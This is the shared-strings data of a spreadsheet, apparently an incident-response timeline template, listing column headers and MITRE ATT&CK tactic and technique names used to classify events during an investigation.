    <t>Date (UTC)</t>
  </si>
  <si>
    <t>System</t>
  </si>
  <si>
    <t>File location</t>
  </si>
  <si>
    <t>Size</t>
  </si>
  <si>
    <t>Technique</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Persistance</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>Initial_Access</t>
  </si>
  <si>
    <t xml:space="preserve">Drive-by Compromise </t>
  </si>
  <si>
    <t xml:space="preserve">Command and Scripting Interpreter </t>
  </si>
  <si>
    <t xml:space="preserve">Account Manipulation </t>
  </si>
  <si>
    <t xml:space="preserve">Abuse Elevation Control Mechanism </t>
  </si>
  <si>
    <t xml:space="preserve">Brute Force </t>
  </si>
  <si>
    <t xml:space="preserve">Account Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Exploitation of Remote Services </t>
  </si>
  <si>
    <t xml:space="preserve">Archive Collected Data </t>
  </si>
  <si>
    <t xml:space="preserve">Application Layer Protocol </t>
  </si>
  <si>
    <t xml:space="preserve">Automated Exfiltration </t>
  </si>
  <si>
    <t xml:space="preserve">Account Access Removal </t>
  </si>
  <si>
    <t xml:space="preserve">Exploit Public-Facing Application </t>
  </si>
  <si>
    <t xml:space="preserve">PowerShell </t>
  </si>
  <si>
    <t xml:space="preserve">Additional Azure Service Principal Credentials </t>
  </si>
  <si>
    <t xml:space="preserve">Setuid and Setgid </t>
  </si>
  <si>
    <t xml:space="preserve">Password Guessing </t>
  </si>
  <si>
    <t xml:space="preserve">Local Account </t>
  </si>
  <si>
    <t xml:space="preserve">Internal Spearphishing </t>
  </si>
  <si>
    <t xml:space="preserve">Archive via Utility </t>
  </si>
  <si>
    <t xml:space="preserve">Web Protocols </t>
  </si>
  <si>
    <t xml:space="preserve">Data Transfer Size Limits </t>
  </si>
  <si>
    <t xml:space="preserve">Data Destruction </t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t xml:space="preserve">External Remote Services </t>
  </si>
  <si>
    <t xml:space="preserve">AppleScript </t>
  </si>
  <si>
    <t xml:space="preserve">Exchange Email Delegate Permissions </t>
  </si>
  <si>
    <t xml:space="preserve">Bypass User Access Control </t>
  </si>
  <si>
    <t xml:space="preserve">Password Cracking </t>
  </si>
  <si>
    <t xml:space="preserve">Domain Account </t>
  </si>
  <si>
    <t xml:space="preserve">Lateral Tool Transfer </t>
  </si>
  <si>
    <t xml:space="preserve">Archive via Library </t>
  </si>
  <si>
    <t xml:space="preserve">File Transfer Protocols </t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration Over Alternative Protocol </t>
  </si>
  <si>
    <t xml:space="preserve">Data Encrypted for Impact </t>
  </si>
  <si>
    <t>Privilege_Escalation</t>
  </si>
  <si>
    <t xml:space="preserve">Hardware Additions </t>
  </si>
  <si>
    <t xml:space="preserve">Windows Command Shell </t>
  </si>
  <si>
    <t xml:space="preserve">Add Office 365 Global Administrator Role </t>
  </si>
  <si>
    <t xml:space="preserve">Sudo and Sudo Caching </t>
  </si>
  <si>
    <t xml:space="preserve">Password Spraying </t>
  </si>
  <si>
    <t xml:space="preserve">Email Account </t>
  </si>
  <si>
    <t xml:space="preserve">Remote Service Session Hijacking </t>
  </si>
  <si>
    <t xml:space="preserve">Archive via Custom Method </t>
  </si>
  <si>
    <t xml:space="preserve">Mail Protocols </t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration Over Symmetric Encrypted Non-C2 Protocol </t>
  </si>
  <si>
    <t xml:space="preserve">Data Manipulation </t>
  </si>
  <si>
    <t>Defense_Evasion</t>
  </si>
  <si>
    <t xml:space="preserve">Phishing </t>
  </si>
  <si>
    <t xml:space="preserve">Unix Shell </t>
  </si>
  <si>
    <t xml:space="preserve">SSH Authorized Keys </t>
  </si>
  <si>
    <t xml:space="preserve">Elevated Execution with Prompt </t>
  </si>
  <si>
    <t xml:space="preserve">Credential Stuffing </t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Account </t>
  </si>
  <si>
    <t xml:space="preserve">SSH Hijacking </t>
  </si>
  <si>
    <t xml:space="preserve">Audio Capture </t>
  </si>
  <si>
    <t xml:space="preserve">DNS </t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration Over Asymmetric Encrypted Non-C2 Protocol </t>
  </si>
  <si>
    <t xml:space="preserve">Stored Data Manipulation </t>
  </si>
  <si>
    <t>Credential_Access</t>
  </si>
  <si>
    <t xml:space="preserve">Spearphishing Attachment </t>
  </si>
  <si>
    <t xml:space="preserve">Visual Basic </t>
  </si>
  <si>
    <t xml:space="preserve">BITS Jobs </t>
  </si>
  <si>
    <t xml:space="preserve">Access Token Manipulation </t>
  </si>
  <si>
    <t xml:space="preserve">Credentials from Password Stores </t>
  </si>
  <si>
    <t xml:space="preserve">Application Window Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">RDP Hijacking </t>
  </si>
  <si>
    <t xml:space="preserve">Automated Collection </t>
  </si>
  <si>
    <t xml:space="preserve">Communication Through Removable Media </t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol </t>
  </si>
  <si>
    <t xml:space="preserve">Transmitted Data Manipulation </t>
  </si>
  <si>
    <t xml:space="preserve">Spearphishing Link </t>
  </si>
  <si>
    <t xml:space="preserve">Python </t>
  </si>
  <si>
    <t xml:space="preserve">Boot or Logon Autostart Execution </t>
  </si>
  <si>
    <t xml:space="preserve">Token Impersonation/Theft </t>
  </si>
  <si>
    <t xml:space="preserve">Keychain </t>
  </si>
  <si>
    <t xml:space="preserve">Browser Bookmark Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Remote Services </t>
  </si>
  <si>
    <t xml:space="preserve">Clipboard Data </t>
  </si>
  <si>
    <t xml:space="preserve">Data Encoding </t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration Over C2 Channel </t>
  </si>
  <si>
    <t xml:space="preserve">Runtime Data Manipulation </t>
  </si>
  <si>
    <t>Lateral_Movement</t>
  </si>
  <si>
    <t xml:space="preserve">Spearphishing via Service </t>
  </si>
  <si>
    <t xml:space="preserve">JavaScript/JScript </t>
  </si>
  <si>
    <t xml:space="preserve">Registry Run Keys / Startup Folder </t>
  </si>
  <si>
    <t xml:space="preserve">Create Process with Token </t>
  </si>
  <si>
    <t xml:space="preserve">Securityd Memory </t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Service Dashboard </t>
  </si>
  <si>
    <t xml:space="preserve">Remote Desktop Protocol </t>
  </si>
  <si>
    <t xml:space="preserve">Data from Cloud Storage Object </t>
  </si>
  <si>
    <t xml:space="preserve">Standard Encoding </t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration Over Other Network Medium </t>
  </si>
  <si>
    <t xml:space="preserve">Defacement </t>
  </si>
  <si>
    <t xml:space="preserve">Replication Through Removable Media </t>
  </si>
  <si>
    <t xml:space="preserve">Exploitation for Client Execution </t>
  </si>
  <si>
    <t xml:space="preserve">Authentication Package </t>
  </si>
  <si>
    <t xml:space="preserve">Make and Impersonate Token </t>
  </si>
  <si>
    <t xml:space="preserve">Credentials from Web Browsers </t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Service Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">SMB/Windows Admin Shares </t>
  </si>
  <si>
    <t xml:space="preserve">Data from Information Repositories </t>
  </si>
  <si>
    <t xml:space="preserve">Non-Standard Encoding </t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration Over Bluetooth </t>
  </si>
  <si>
    <t xml:space="preserve">Internal Defacement </t>
  </si>
  <si>
    <t>Command_and_Control</t>
  </si>
  <si>
    <t xml:space="preserve">Supply Chain Compromise </t>
  </si>
  <si>
    <t xml:space="preserve">Inter-Process Communication </t>
  </si>
  <si>
    <t xml:space="preserve">Time Providers </t>
  </si>
  <si>
    <t xml:space="preserve">Parent PID Spoofing </t>
  </si>
  <si>
    <t xml:space="preserve">Exploitation for Credential Access </t>
  </si>
  <si>
    <t xml:space="preserve">Domain Trust Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Distributed Component Object Model </t>
  </si>
  <si>
    <t xml:space="preserve">Confluence </t>
  </si>
  <si>
    <t xml:space="preserve">Data Obfuscation </t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration Over Physical Medium </t>
  </si>
  <si>
    <t xml:space="preserve">External Defacement </t>
  </si>
  <si>
    <t xml:space="preserve">Compromise Software Dependencies and Development Tools </t>
  </si>
  <si>
    <t xml:space="preserve">Component Object Model </t>
  </si>
  <si>
    <t xml:space="preserve">Winlogon Helper DLL </t>
  </si>
  <si>
    <t xml:space="preserve">SID-History Injection </t>
  </si>
  <si>
    <t xml:space="preserve">Forced Authentication </t>
  </si>
  <si>
    <t xml:space="preserve">File and Directory Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">SSH </t>
  </si>
  <si>
    <t xml:space="preserve">Sharepoint </t>
  </si>
  <si>
    <t xml:space="preserve">Junk Data </t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration over USB </t>
  </si>
  <si>
    <t xml:space="preserve">Disk Wipe </t>
  </si>
  <si>
    <t xml:space="preserve">Compromise Software Supply Chain </t>
  </si>
  <si>
    <t xml:space="preserve">Dynamic Data Exchange </t>
  </si>
  <si>
    <t xml:space="preserve">Security Support Provider </t>
  </si>
  <si>
    <t xml:space="preserve">Input Capture </t>
  </si>
  <si>
    <t xml:space="preserve">Network Service Scanning </t>
  </si>
  <si>
    <t xml:space="preserve">VNC </t>
  </si>
  <si>
    <t xml:space="preserve">Data from Local System </t>
  </si>
  <si>
    <t xml:space="preserve">Steganography </t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration Over Web Service </t>
  </si>
  <si>
    <t xml:space="preserve">Disk Content Wipe </t>
  </si>
  <si>
    <t xml:space="preserve">Compromise Hardware Supply Chain </t>
  </si>
  <si>
    <t xml:space="preserve">Native API </t>
  </si>
  <si>
    <t xml:space="preserve">Kernel Modules and Extensions </t>
  </si>
  <si>
    <t xml:space="preserve">Deobfuscate/Decode Files or Information </t>
  </si>
  <si>
    <t xml:space="preserve">Keylogging </t>
  </si>
  <si>
    <t xml:space="preserve">Network Share Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Windows Remote Management </t>
  </si>
  <si>
    <t xml:space="preserve">Data from Network Shared Drive </t>
  </si>
  <si>
    <t xml:space="preserve">Protocol Impersonation </t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration to Code Repository </t>
  </si>
  <si>
    <t xml:space="preserve">Disk Structure Wipe </t>
  </si>
  <si>
    <t xml:space="preserve">Trusted Relationship </t>
  </si>
  <si>
    <t xml:space="preserve">Scheduled Task/Job </t>
  </si>
  <si>
    <t xml:space="preserve">Re-opened Applications </t>
  </si>
  <si>
    <t xml:space="preserve">Direct Volume Access </t>
  </si>
  <si>
    <t xml:space="preserve">GUI Input Capture </t>
  </si>
  <si>
    <t xml:space="preserve">Network Sniffing </t>
  </si>
  <si>
    <t xml:space="preserve">Data from Removable Media </t>
  </si>
  <si>
    <t xml:space="preserve">Dynamic Resolution </t>
  </si>
  <si>
    <t xml:space="preserve">Exfiltration to Cloud Storage </t>
  </si>
  <si>
    <t xml:space="preserve">Endpoint Denial of Service </t>
  </si>
  <si>
    <t xml:space="preserve">Valid Accounts </t>
  </si>
  <si>
    <t xml:space="preserve">At (Linux) </t>
  </si>
  <si>
    <t xml:space="preserve">LSASS Driver </t>
  </si>
  <si>
    <t xml:space="preserve">Execution Guardrails </t>
  </si>
  <si>
    <t xml:space="preserve">Web Portal Capture </t>
  </si>
  <si>
    <t xml:space="preserve">Password Policy Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Software Deployment Tools </t>
  </si>
  <si>
    <t xml:space="preserve">Data Staged </t>
  </si>
  <si>
    <t xml:space="preserve">Fast Flux DNS </t>
  </si>
  <si>
    <t xml:space="preserve">Scheduled Transfer </t>
  </si>
  <si>
    <t xml:space="preserve">OS Exhaustion Flood </t>
  </si>
  <si>
    <t xml:space="preserve">Default Accounts </t>
  </si>
  <si>
    <t xml:space="preserve">At (Windows) </t>
  </si>
  <si>
    <t xml:space="preserve">Shortcut Modification </t>
  </si>
  <si>
    <t xml:space="preserve">Environmental Keying </t>
  </si>
  <si>
    <t xml:space="preserve">Credential API Hooking </t>
  </si>
  <si>
    <t xml:space="preserve">Peripheral Device Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Taint Shared Content </t>
  </si>
  <si>
    <t xml:space="preserve">Local Data Staging </t>
  </si>
  <si>
    <t xml:space="preserve">Domain Generation Algorithms </t>
  </si>
  <si>
    <t xml:space="preserve">Transfer Data to Cloud Account </t>
  </si>
  <si>
    <t xml:space="preserve">Service Exhaustion Flood </t>
  </si>
  <si>
    <t xml:space="preserve">Domain Accounts </t>
  </si>
  <si>
    <t xml:space="preserve">Cron </t>
  </si>
  <si>
    <t xml:space="preserve">Port Monitors </t>
  </si>
  <si>
    <t xml:space="preserve">Exploitation for Defense Evasion </t>
  </si>
  <si>
    <t xml:space="preserve">Man-in-the-Middle </t>
  </si>
  <si>
    <t xml:space="preserve">Permission Groups Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Use Alternate Authentication Material </t>
  </si>
  <si>
    <t xml:space="preserve">Remote Data Staging </t>
  </si>
  <si>
    <t xml:space="preserve">DNS Calculation </t>
  </si>
  <si>
    <t xml:space="preserve">Application Exhaustion Flood </t>
  </si>
  <si>
    <t xml:space="preserve">Local Accounts </t>
  </si>
  <si>
    <t xml:space="preserve">Launchd </t>
  </si>
  <si>
    <t xml:space="preserve">Plist Modification </t>
  </si>
  <si>
    <t xml:space="preserve">File and Directory Permissions Modification </t>
  </si>
  <si>
    <t xml:space="preserve">LLMNR/NBT-NS Poisoning and SMB Relay </t>
  </si>
  <si>
    <t xml:space="preserve">Local Groups </t>
  </si>
  <si>
    <t xml:space="preserve">Application Access Token </t>
  </si>
  <si>
    <t xml:space="preserve">Email Collection </t>
  </si>
  <si>
    <t xml:space="preserve">Encrypted Channel </t>
  </si>
  <si>
    <t xml:space="preserve">Application or System Exploitation </t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Accounts </t>
  </si>
  <si>
    <t xml:space="preserve">Scheduled Task </t>
  </si>
  <si>
    <t xml:space="preserve">Boot or Logon Initialization Scripts </t>
  </si>
  <si>
    <t xml:space="preserve">Windows File and Directory Permissions Modification </t>
  </si>
  <si>
    <t xml:space="preserve">Modify Authentication Process </t>
  </si>
  <si>
    <t xml:space="preserve">Domain Groups </t>
  </si>
  <si>
    <t xml:space="preserve">Pass the Hash </t>
  </si>
  <si>
    <t xml:space="preserve">Local Email Collection </t>
  </si>
  <si>
    <t xml:space="preserve">Symmetric Cryptography </t>
  </si>
  <si>
    <t xml:space="preserve">Firmware Corruption </t>
  </si>
  <si>
    <t xml:space="preserve">Shared Modules </t>
  </si>
  <si>
    <t xml:space="preserve">Logon Script (Windows) </t>
  </si>
  <si>
    <t xml:space="preserve">Linux and Mac File and Directory Permissions Modification </t>
  </si>
  <si>
    <t xml:space="preserve">Domain Controller Authentication </t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Groups </t>
  </si>
  <si>
    <t xml:space="preserve">Pass the Ticket </t>
  </si>
  <si>
    <t xml:space="preserve">Remote Email Collection </t>
  </si>
  <si>
    <t xml:space="preserve">Asymmetric Cryptography </t>
  </si>
  <si>
    <t xml:space="preserve">Inhibit System Recovery </t>
  </si>
  <si>
    <t xml:space="preserve">Logon Script (Mac) </t>
  </si>
  <si>
    <t xml:space="preserve">Group Policy Modification </t>
  </si>
  <si>
    <t xml:space="preserve">Password Filter DLL </t>
  </si>
  <si>
    <t xml:space="preserve">Process Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Web Session Cookie </t>
  </si>
  <si>
    <t xml:space="preserve">Email Forwarding Rule </t>
  </si>
  <si>
    <t xml:space="preserve">Fallback Channels </t>
  </si>
  <si>
    <t xml:space="preserve">Network Denial of Service </t>
  </si>
  <si>
    <t xml:space="preserve">System Services </t>
  </si>
  <si>
    <t xml:space="preserve">Network Logon Script </t>
  </si>
  <si>
    <t xml:space="preserve">Hide Artifacts </t>
  </si>
  <si>
    <t xml:space="preserve">Pluggable Authentication Modules </t>
  </si>
  <si>
    <t xml:space="preserve">Query Registry </t>
  </si>
  <si>
    <t xml:space="preserve">Ingress Tool Transfer </t>
  </si>
  <si>
    <t xml:space="preserve">Direct Network Flood </t>
  </si>
  <si>
    <t xml:space="preserve">Launchctl </t>
  </si>
  <si>
    <t xml:space="preserve">Rc.common </t>
  </si>
  <si>
    <t xml:space="preserve">Hidden Files and Directories </t>
  </si>
  <si>
    <t xml:space="preserve">Remote System Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Multi-Stage Channels </t>
  </si>
  <si>
    <t xml:space="preserve">Reflection Amplification </t>
  </si>
  <si>
    <t xml:space="preserve">Service Execution </t>
  </si>
  <si>
    <t xml:space="preserve">Startup Items </t>
  </si>
  <si>
    <t xml:space="preserve">Hidden Users </t>
  </si>
  <si>
    <t xml:space="preserve">OS Credential Dumping </t>
  </si>
  <si>
    <t xml:space="preserve">Software Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Non-Application Layer Protocol </t>
  </si>
  <si>
    <t xml:space="preserve">Resource Hijacking </t>
  </si>
  <si>
    <t xml:space="preserve">User Execution </t>
  </si>
  <si>
    <t xml:space="preserve">Browser Extensions </t>
  </si>
  <si>
    <t xml:space="preserve">Hidden Window </t>
  </si>
  <si>
    <t xml:space="preserve">LSASS Memory </t>
  </si>
  <si>
    <t xml:space="preserve">Security Software Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Non-Standard Port </t>
  </si>
  <si>
    <t xml:space="preserve">Service Stop </t>
  </si>
  <si>
    <t xml:space="preserve">Malicious Link </t>
  </si>
  <si>
    <t xml:space="preserve">Compromise Client Software Binary </t>
  </si>
  <si>
    <t xml:space="preserve">NTFS File Attributes </t>
  </si>
  <si>
    <t xml:space="preserve">Security Account Manager </t>
  </si>
  <si>
    <t xml:space="preserve">System Information Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Protocol Tunneling </t>
  </si>
  <si>
    <t xml:space="preserve">System Shutdown/Reboot </t>
  </si>
  <si>
    <t xml:space="preserve">Malicious File </t>
  </si>
  <si>
    <t xml:space="preserve">Create Account </t>
  </si>
  <si>
    <t xml:space="preserve">Hidden File System </t>
  </si>
  <si>
    <t xml:space="preserve">NTDS </t>
  </si>
  <si>
    <t xml:space="preserve">System Network Configuration Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Man in the Browser </t>
  </si>
  <si>
    <t xml:space="preserve">Proxy </t>
  </si>
  <si>
    <t xml:space="preserve">Windows Management Instrumentation </t>
  </si>
  <si>
    <t xml:space="preserve">Run Virtual Instance </t>
  </si>
  <si>
    <t xml:space="preserve">LSA Secrets </t>
  </si>
  <si>
    <t xml:space="preserve">System Network Connections Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Internal Proxy </t>
  </si>
  <si>
    <t xml:space="preserve">Hijack Execution Flow </t>
  </si>
  <si>
    <t xml:space="preserve">Cached Domain Credentials </t>
  </si>
  <si>
    <t xml:space="preserve">System Owner/User Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">External Proxy </t>
  </si>
  <si>
    <t xml:space="preserve">Create or Modify System Process </t>
  </si>
  <si>
    <t xml:space="preserve">DLL Search Order Hijacking </t>
  </si>
  <si>
    <t xml:space="preserve">DCSync </t>
  </si>
  <si>
    <t xml:space="preserve">System Service Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Screen Capture </t>
  </si>
  <si>
    <t xml:space="preserve">Multi-hop Proxy </t>
  </si>
  <si>
    <t xml:space="preserve">Launch Agent </t>
  </si>
  <si>
    <t xml:space="preserve">DLL Side-Loading </t>
  </si>
  <si>
    <t xml:space="preserve">Proc Filesystem </t>
  </si>
  <si>
    <t xml:space="preserve">System Time Discovery </t>
  </si>
  <si>
    <t xml:space="preserve">Video Capture </t>
  </si>
  <si>
    <t xml:space="preserve">Domain Fronting </t>
  </si>
  <si>
    <t xml:space="preserve">Systemd Service </t>
  </si>
  <si>
    <t xml:space="preserve">Dylib Hijacking </t>
  </si>
  <si>
    <t xml:space="preserve">/etc/passwd and /etc/shadow </t>
  </si>
  <si>
    <t xml:space="preserve">Virtualization/Sandbox Evasion </t>
  </si>
  <si>
    <t xml:space="preserve">Remote Access Software </t>
  </si>
  <si>
    <t xml:space="preserve">Windows Service </t>
  </si>
  <si>
    <t xml:space="preserve">Executable Installer File Permissions Weakness </t>
  </si>
  <si>
    <t xml:space="preserve">Steal Application Access Token </t>
  </si>
  <si>
    <t xml:space="preserve">System Checks </t>
  </si>
  <si>
    <t xml:space="preserve">Traffic Signaling </t>
  </si>
  <si>
    <t xml:space="preserve">Launch Daemon </t>
  </si>
  <si>
    <t xml:space="preserve">LD_PRELOAD </t>
  </si>
  <si>
    <t xml:space="preserve">Steal or Forge Kerberos Tickets </t>
  </si>
  <si>
    <t xml:space="preserve">User Activity Based Checks </t>
  </si>
  <si>
    <t xml:space="preserve">Port Knocking </t>
  </si>
  <si>
    <t xml:space="preserve">Event Triggered Execution </t>
  </si>
  <si>
    <t xml:space="preserve">Path Interception by PATH Environment Variable </t>
  </si>
  <si>
    <t xml:space="preserve">Golden Ticket </t>
  </si>
  <si>
    <t xml:space="preserve">Time Based Evasion </t>
  </si>
  <si>
    <t xml:space="preserve">Web Service </t>
  </si>
  <si>
    <t xml:space="preserve">Change Default File Association </t>
  </si>
  <si>
    <t xml:space="preserve">Path Interception by Search Order Hijacking </t>
  </si>
  <si>
    <t xml:space="preserve">Silver Ticket </t>
  </si>
  <si>
    <t xml:space="preserve">Dead Drop Resolver </t>
  </si>
  <si>
    <t xml:space="preserve">Screensaver </t>
  </si>
  <si>
    <t xml:space="preserve">Path Interception by Unquoted Path </t>
  </si>
  <si>
    <t xml:space="preserve">Kerberoasting </t>
  </si>
  <si>
    <t xml:space="preserve">Bidirectional Communication </t>
  </si>
  <si>
    <t xml:space="preserve">Windows Management Instrumentation Event Subscription </t>
  </si>
  <si>
    <t xml:space="preserve">Services File Permissions Weakness </t>
  </si>
  <si>
    <t xml:space="preserve">Steal Web Session Cookie </t>
  </si>
  <si>
    <t xml:space="preserve">One-Way Communication </t>
  </si>
  <si>
    <t xml:space="preserve">.bash_profile and .bashrc </t>
  </si>
  <si>
    <t xml:space="preserve">Services Registry Permissions Weakness </t>
  </si>
  <si>
    <t xml:space="preserve">Two-Factor Authentication Interception </t>
  </si>
  <si>
    <t xml:space="preserve">Trap </t>
  </si>
  <si>
    <t xml:space="preserve">COR_PROFILER </t>
  </si>
  <si>
    <t xml:space="preserve">Unsecured Credentials </t>
  </si>
  <si>
    <t xml:space="preserve">LC_LOAD_DYLIB Addition </t>
  </si>
  <si>
    <t xml:space="preserve">Impair Defenses </t>
  </si>
  <si>
    <t xml:space="preserve">Credentials In Files </t>
  </si>
  <si>
    <t xml:space="preserve">Netsh Helper DLL </t>
  </si>
  <si>
    <t xml:space="preserve">Disable or Modify Tools </t>
  </si>
  <si>
    <t xml:space="preserve">Credentials in Registry </t>
  </si>
  <si>
    <t xml:space="preserve">Accessibility Features </t>
  </si>
  <si>
    <t xml:space="preserve">Disable Windows Event Logging </t>
  </si>
  <si>
    <t xml:space="preserve">Bash History </t>
  </si>
  <si>
    <t xml:space="preserve">AppCert DLLs </t>
  </si>
  <si>
    <t xml:space="preserve">HISTCONTROL </t>
  </si>
  <si>
    <t xml:space="preserve">Private Keys </t>
  </si>
  <si>
    <t xml:space="preserve">AppInit DLLs </t>
  </si>
  <si>
    <t xml:space="preserve">Disable or Modify System Firewall </t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Instance Metadata API </t>
  </si>
  <si>
    <t xml:space="preserve">Application Shimming </t>
  </si>
  <si>
    <t xml:space="preserve">Indicator Blocking </t>
  </si>
  <si>
    <t xml:space="preserve">Group Policy Preferences </t>
  </si>
  <si>
    <t xml:space="preserve">Image File Execution Options Injection </t>
  </si>
  <si>
    <t xml:space="preserve">Disable or Modify Cloud Firewall </t>
  </si>
  <si>
    <t xml:space="preserve">PowerShell Profile </t>
  </si>
  <si>
    <t xml:space="preserve">Indicator Removal on Host </t>
  </si>
  <si>
    <t xml:space="preserve">Emond </t>
  </si>
  <si>
    <t xml:space="preserve">Clear Windows Event Logs </t>
  </si>
  <si>
    <t xml:space="preserve">Component Object Model Hijacking </t>
  </si>
  <si>
    <t xml:space="preserve">Clear Linux or Mac System Logs </t>
  </si>
  <si>
    <t xml:space="preserve">Exploitation for Privilege Escalation </t>
  </si>
  <si>
    <t xml:space="preserve">Clear Command History </t>
  </si>
  <si>
    <t xml:space="preserve">File Deletion </t>
  </si>
  <si>
    <t xml:space="preserve">Network Share Connection Removal </t>
  </si>
  <si>
    <t xml:space="preserve">Timestomp </t>
  </si>
  <si>
    <t xml:space="preserve">Indirect Command Execution </t>
  </si>
  <si>
    <t xml:space="preserve">Masquerading </t>
  </si>
  <si>
    <t xml:space="preserve">Invalid Code Signature </t>
  </si>
  <si>
    <t xml:space="preserve">Right-to-Left Override </t>
  </si>
  <si>
    <t xml:space="preserve">Rename System Utilities </t>
  </si>
  <si>
    <t xml:space="preserve">Masquerade Task or Service </t>
  </si>
  <si>
    <t xml:space="preserve">Match Legitimate Name or Location </t>
  </si>
  <si>
    <t xml:space="preserve">Space after Filename </t>
  </si>
  <si>
    <t xml:space="preserve">Implant Container Image </t>
  </si>
  <si>
    <t xml:space="preserve">Process Injection </t>
  </si>
  <si>
    <t xml:space="preserve">Office Application Startup </t>
  </si>
  <si>
    <t xml:space="preserve">Dynamic-link Library Injection </t>
  </si>
  <si>
    <t xml:space="preserve">Office Template Macros </t>
  </si>
  <si>
    <t xml:space="preserve">Portable Executable Injection </t>
  </si>
  <si>
    <t xml:space="preserve">Modify Cloud Compute Infrastructure </t>
  </si>
  <si>
    <t xml:space="preserve">Office Test </t>
  </si>
  <si>
    <t xml:space="preserve">Thread Execution Hijacking </t>
  </si>
  <si>
    <t xml:space="preserve">Create Snapshot </t>
  </si>
  <si>
    <t xml:space="preserve">Outlook Forms </t>
  </si>
  <si>
    <t xml:space="preserve">Asynchronous Procedure Call </t>
  </si>
  <si>
    <t xml:space="preserve">Create Cloud Instance </t>
  </si>
  <si>
    <t xml:space="preserve">Outlook Home Page </t>
  </si>
  <si>
    <t xml:space="preserve">Thread Local Storage </t>
  </si>
  <si>
    <t xml:space="preserve">Delete Cloud Instance </t>
  </si>
  <si>
    <t xml:space="preserve">Outlook Rules </t>
  </si>
  <si>
    <t xml:space="preserve">Ptrace System Calls </t>
  </si>
  <si>
    <t xml:space="preserve">Revert Cloud Instance </t>
  </si>
  <si>
    <t xml:space="preserve">Add-ins </t>
  </si>
  <si>
    <t xml:space="preserve">Proc Memory </t>
  </si>
  <si>
    <t xml:space="preserve">Modify Registry </t>
  </si>
  <si>
    <t xml:space="preserve">Pre-OS Boot </t>
  </si>
  <si>
    <t xml:space="preserve">Extra Window Memory Injection </t>
  </si>
  <si>
    <t xml:space="preserve">Obfuscated Files or Information </t>
  </si>
  <si>
    <t xml:space="preserve">System Firmware </t>
  </si>
  <si>
    <t xml:space="preserve">Process Hollowing </t>
  </si>
  <si>
    <t xml:space="preserve">Binary Padding </t>
  </si>
  <si>
    <t xml:space="preserve">Component Firmware </t>
  </si>
  <si>
    <t xml:space="preserve">Process Doppelgänging </t>
  </si>
  <si>
    <t xml:space="preserve">Software Packing </t>
  </si>
  <si>
    <t xml:space="preserve">Bootkit </t>
  </si>
  <si>
    <t xml:space="preserve">VDSO Hijacking </t>
  </si>
  <si>
    <t xml:space="preserve">Compile After Delivery </t>
  </si>
  <si>
    <t xml:space="preserve">Indicator Removal from Tools </t>
  </si>
  <si>
    <t xml:space="preserve">Server Software Component </t>
  </si>
  <si>
    <t xml:space="preserve">SQL Stored Procedures </t>
  </si>
  <si>
    <t xml:space="preserve">Transport Agent </t>
  </si>
  <si>
    <t xml:space="preserve">Web Shell </t>
  </si>
  <si>
    <t xml:space="preserve">Rogue Domain Controller </t>
  </si>
  <si>
    <t xml:space="preserve">Rootkit </t>
  </si>
  <si>
    <t xml:space="preserve">Signed Binary Proxy Execution </t>
  </si>
  <si>
    <t xml:space="preserve">Compiled HTML File </t>
  </si>
  <si>
    <t xml:space="preserve">Control Panel </t>
  </si>
  <si>
    <t xml:space="preserve">CMSTP </t>
  </si>
  <si>
    <t xml:space="preserve">InstallUtil </t>
  </si>
  <si>
    <t xml:space="preserve">Mshta </t>
  </si>
  <si>
    <t xml:space="preserve">Msiexec </t>
  </si>
  <si>
    <t xml:space="preserve">Odbcconf </t>
  </si>
  <si>
    <t xml:space="preserve">Regsvcs/Regasm </t>
  </si>
  <si>
    <t xml:space="preserve">Regsvr32 </t>
  </si>
  <si>
    <t xml:space="preserve">Rundll32 </t>
  </si>
  <si>
    <t xml:space="preserve">Signed Script Proxy Execution </t>
  </si>
  <si>
    <t xml:space="preserve">PubPrn </t>
  </si>
  <si>
    <t xml:space="preserve">Subvert Trust Controls </t>
  </si>
  <si>
    <t xml:space="preserve">Gatekeeper Bypass </t>
  </si>
  <si>
    <t xml:space="preserve">Code Signing </t>
